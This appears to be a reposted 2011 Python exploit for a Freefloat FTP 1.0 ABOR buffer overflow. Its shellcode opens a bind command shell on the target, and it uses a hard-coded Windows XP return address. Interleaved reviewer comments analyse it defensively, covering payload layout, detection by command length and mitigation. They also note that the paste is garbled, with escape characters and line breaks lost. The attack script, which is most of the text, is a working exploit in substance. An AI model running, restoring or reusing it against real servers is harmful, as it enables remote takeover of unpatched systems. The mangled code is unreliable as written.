
Freefloat FTP 1.0 ABOR Buffer Overflow

Posted on 19 July 2011

#!/usr/bin/python #Title: Freefloat FTP 1.0 ABOR Exploit #Author: Craig Freyman (@cd1zz) #Date: July 18, 2011 #Tested on Windows XP SP3 import socket,sys,time,struct if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "x00xffx0dx0ax3dx20" #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ("xbfx5cx2ax11xb3xd9xe5xd9x74x24xf4x5dx33xc9" "xb1x56x83xc5x04x31x7dx0fx03x7dx53xc8xe4x4f" "x83x85x07xb0x53xf6x8ex55x62x24xf4x1exd6xf8" "x7ex72xdax73xd2x67x69xf1xfbx88xdaxbcxddxa7" "xdbx70xe2x64x1fx12x9ex76x73xf4x9fxb8x86xf5" "xd8xa5x68xa7xb1xa2xdax58xb5xf7xe6x59x19x7c" "x56x22x1cx43x22x98x1fx94x9ax97x68x0cx91xf0" "x48x2dx76xe3xb5x64xf3xd0x4ex77xd5x28xaex49" "x19xe6x91x65x94xf6xd6x42x46x8dx2cxb1xfbx96" "xf6xcbx27x12xebx6cxacx84xcfx8dx61x52x9bx82" "xcex10xc3x86xd1xf5x7fxb2x5axf8xafx32x18xdf" "x6bx1exfbx7ex2dxfaxaax7fx2dxa2x13xdax25x41" "x40x5cx64x0exa5x53x97xcexa1xe4xe4xfcx6ex5f" "x63x4dxe7x79x74xb2xd2x3exeax4dxdcx3ex22x8a" "x88x6ex5cx3bxb0xe4x9cxc4x65xaaxccx6axd5x0b" "xbdxcax85xe3xd7xc4xfax14xd8x0ex8dx12x16x6a" "xdexf4x5bx8cxf1x58xd5x6ax9bx70xb3x25x33xb3" "xe0xfdxa4xccxc2x51x7dx5bx5axbcxb9x64x5bxea" "xeaxc9xf3x7dx78x02xc0x9cx7fx0fx60xd6xb8xd8" "xfax86x0bx78xfax82xfbx19x69x49xfbx54x92xc6" "xacx31x64x1fx38xacxdfx89x5ex2dxb9xf2xdaxea" "x7axfcxe3x7fxc6xdaxf3xb9xc7x66xa7x15x9ex30" "x11xd0x48xf3xcbx8ax27x5dx9bx4bx04x5exddx53" "x41x28x01xe5x3cx6dx3excaxa8x79x47x36x49x85" "x92xf2x79xccxbex53x12x89x2bxe6x7fx2ax86x25" "x86xa9x22xd6x7dxb1x47xd3x3ax75xb4xa9x53x10" "xbax1ex53x31") #7C874413 FFE4 JMP ESP kernel32.dll ret = struct.pack('<L', 0x7C874413) padding = "x90" * 150 crash = "x41" * 246 + ret + padding + shellcode print "\n[*] Freefloat FTP 1.0 ABOR Exploit \n[*] Author: Craig Freyman (@cd1zz) \n[*] Connecting to "+target s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: 
# NOTE(review): this listing is a whitespace-mangled paste of a 2011 Python 2
# proof-of-concept. The whole script was collapsed onto two physical lines, so
# on the line above everything from "#Title:" onward is syntactically one
# comment, and the backslashes of the "\x.." escapes in the shellcode, the
# "\x90" NOP sled, the "\x41" filler and the FTP line terminators were lost in
# extraction. It is not runnable as shown and is left byte-for-byte as posted.
#
# What the code describes (defender's reading of the visible lines):
#  - Vulnerability class: stack buffer overflow in Freefloat FTP 1.0, reached
#    by an over-long argument to the ABOR command after an anonymous login
#    (USER anonymous / PASS). Per RFC 959, ABOR takes no argument at all, so
#    any ABOR carrying a sizeable payload is by itself anomalous traffic.
#  - Payload layout: 246 filler bytes, a 4-byte return address, a 150-byte
#    NOP sled, then a 368-byte encoded payload (size per the msfencode
#    comment). The whole ABOR line is therefore roughly 770 bytes -- a
#    simple length check on FTP command lines at a proxy/IDS catches it.
#  - Return address: hard-coded 0x7C874413, a JMP ESP gadget in the Windows
#    XP SP3 kernel32.dll (author's "Tested on" note). The address only holds
#    on that exact OS/patch level with no ASLR, and DEP blocks execution of
#    the stack-resident sled/shellcode; on supported Windows versions this
#    PoC as written would crash the service rather than run the payload.
#  - Payload: the comment says windows/shell_bind_tcp, i.e. presumably a
#    listening command shell on the victim; the bind port is not shown here.
#    Post-exploitation indicator would be the FTP server process opening an
#    unexpected listening socket -- verify port against the msfpayload
#    defaults of that era before writing a rule.
#  - The `platform` argument is read from argv but never used below.
# Mitigation: the product has no vendor fix; do not expose it, and a crash of
# the service after an ABOR line is a reliable sign of an attempt. The
# connection below swallows every exception with a bare except: (style
# issue in the original, left unchanged).
 s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] Sending " + `len(crash)` + " byte crash..." s.send("USER anonymous ") s.recv(1024) s.send("PASS ") s.recv(1024) s.send("ABOR " + crash + " ") time.sleep(4)
# The `len(crash)` in backticks is the Python 2 repr() shorthand; the
# s.send(...) strings lost their "\r\n" terminators in the paste, so the
# login and ABOR lines as printed here would never be parsed by an FTP
# server as complete commands. sleep(4) just keeps the socket open long
# enough for the server to consume the request before the script exits.

 
